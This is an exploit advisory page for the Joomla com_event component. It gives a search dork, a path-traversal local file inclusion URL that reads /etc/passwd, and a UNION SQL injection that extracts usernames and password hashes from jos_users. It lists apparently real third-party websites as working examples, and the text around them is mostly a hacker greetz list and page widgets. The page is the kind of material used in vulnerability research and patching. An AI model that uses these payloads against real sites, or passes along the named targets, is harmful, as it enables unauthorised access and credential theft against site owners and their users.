The Joomla Event component local file inclusion

2010.05.19

Credit: altbta

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:\"com_event\"

####################################################################
>>>>> Author : altbta (l_9@hotmail.com)
>>>>> Home : [v4-team.com].[xp10.me]
>>>>> Script : Joomla Component com_event
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_event"
####################################################################
===[ Exploit ]=== [LFI]
http://site/index.php?option=com_event&view=[LFI]
http://site/index.php?option=com_event&view=../../../../../../../../../../../../../../../etc/passwd%00
'
===[ Example ]===
http://www.eurocham.org.sg/index.php?option=com_event&view=../../../../../../../../../../../../../../../etc/passwd%00
'
===[ Exploit ]=== [sql]
http://site/index.php?option=com_event&task=details&sid=61 [sql]
http://site/index.php?option=com_event&task=details&sid=-61 union select
1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--
===[ Example ]===
http://www.eeii.org.in/index.php?option=com_event&task=details&sid=-61 union
select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--
####################################################################
RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The Joomla Event component local file inclusion

Dork: inurl:\"com_event\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.